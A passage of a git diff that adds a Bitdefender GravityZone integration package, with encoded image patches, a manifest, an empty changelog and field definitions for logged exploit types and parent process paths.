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
N=<}F!g=a4R@joDI>9YU;

literal 0
HcmV?d00001

diff --git a/Bitdefender/_meta/manifest.yml b/Bitdefender/_meta/manifest.yml
new file mode 100644
index 000000000..1a00ddd37
--- /dev/null
+++ b/Bitdefender/_meta/manifest.yml
@@ -0,0 +1,5 @@
+uuid: 26277889-b91b-46d0-8bac-7f6b2f6fb9a3
+name: Bitdefender
+slug: "bitdefender"
+description: >-
+  Bitdefender is a global cybersecurity company renowned for its advanced antivirus software, providing comprehensive security solutions and threat intelligence for individuals and enterprises, safeguarding against evolving cyber threats.
diff --git a/Bitdefender/gravityzone/CHANGELOG.md b/Bitdefender/gravityzone/CHANGELOG.md
new file mode 100644
index 000000000..11bddf32c
--- /dev/null
+++ b/Bitdefender/gravityzone/CHANGELOG.md
@@ -0,0 +1,8 @@
+# Changelog
+
+All notable changes to this project will be documented in this file.
+
+The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
+and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
+
+## [Unreleased]
diff --git a/Bitdefender/gravityzone/_meta/fields.yml b/Bitdefender/gravityzone/_meta/fields.yml
new file mode 100644
index 000000000..57f24a53a
--- /dev/null
+++ b/Bitdefender/gravityzone/_meta/fields.yml
@@ -0,0 +1,9 @@
+bitdefender.gravityzone.exploit.type:
+  description: 'Exploit type detected by Bitdefender GravityZone.'
+  name: bitdefender.gravityzone.exploit.type
+  type: keyword
+
+process.parent.path:
+  description: 'Path of the parent process.'
+  name: process.parent.path
+  type: keyword
diff --git a/Bitdefender/gravityzone/_meta/logo.png b/Bitdefender/gravityzone/_meta/logo.png
new file mode 100644
index 0000000000000000000000000000000000000000..dd360bce9b147401e7cd703dde3e550bf835be78
GIT binary patch
literal 30360
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
